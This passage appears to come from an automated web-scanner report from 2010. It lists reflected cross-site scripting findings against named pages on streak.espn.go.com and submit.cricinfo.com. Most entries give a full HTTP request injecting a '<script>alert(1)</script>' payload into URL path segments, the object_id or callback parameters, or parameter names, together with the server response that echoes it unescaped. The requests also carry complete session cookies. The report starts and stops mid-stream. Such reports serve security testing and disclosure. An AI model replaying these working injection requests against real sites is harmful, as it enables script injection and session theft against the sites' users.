s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enebfd3<script>alert(1)</script>d621151af8a/conversation</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6338<script>alert(1)</script>735d75941d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/conversationc6338<script>alert(1)</script>735d75941d4 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 137 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/conversationc6338<script>alert(1)</script>735d75941d4</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71549<script>alert(1)</script>907b7ff7526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058b<script>alert(1)</script>6b3ce37571f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f2a<script>alert(1)</script>2fd0abe5ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en67f2a<script>alert(1)</script>2fd0abe5ee5/entry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en67f2a<script>alert(1)</script>2fd0abe5ee5/entry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9d1a<script>alert(1)</script>bc676b3bd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryc9d1a<script>alert(1)</script>bc676b3bd41 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 130 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryc9d1a<script>alert(1)</script>bc676b3bd41</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1f44<script>alert(1)</script>648104297fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf1f44<script>alert(1)</script>648104297fd/entryStats HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 138 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf1f44<script>alert(1)</script>648104297fd/entryStats</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73792<script>alert(1)</script>b498764bc6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryStats73792<script>alert(1)</script>b498764bc6c HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 135 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryStats73792<script>alert(1)</script>b498764bc6c</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f170a<script>alert(1)</script>a531fa92f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf170a<script>alert(1)</script>a531fa92f90/story HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf170a<script>alert(1)</script>a531fa92f90/story</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f72f3<script>alert(1)</script>5c58c16e8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/storyf72f3<script>alert(1)</script>5c58c16e8fd HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 130 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/storyf72f3<script>alert(1)</script>5c58c16e8fd</BODY></HTML>
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a682"><script>alert(1)</script>a5ecb98fc96 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d4a"><script>alert(1)</script>ae55648a8a6 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2d5"><script>alert(1)</script>b00739a6776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:14:08 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148320 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:08 ...[SNIP]... <input type="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1"> ...[SNIP]...
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 264cf"><script>alert(1)</script>5ffea527bb5 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:39 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148519 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:12:39 ...[SNIP]... ="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5"> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5bb4b<script>alert(1)</script>67896ac1a97 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/login_validate.html?callback=?5bb4b<script>alert(1)</script>67896ac1a97 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
5.140. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e3a"><script>alert(1)</script>f099b4e3b36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
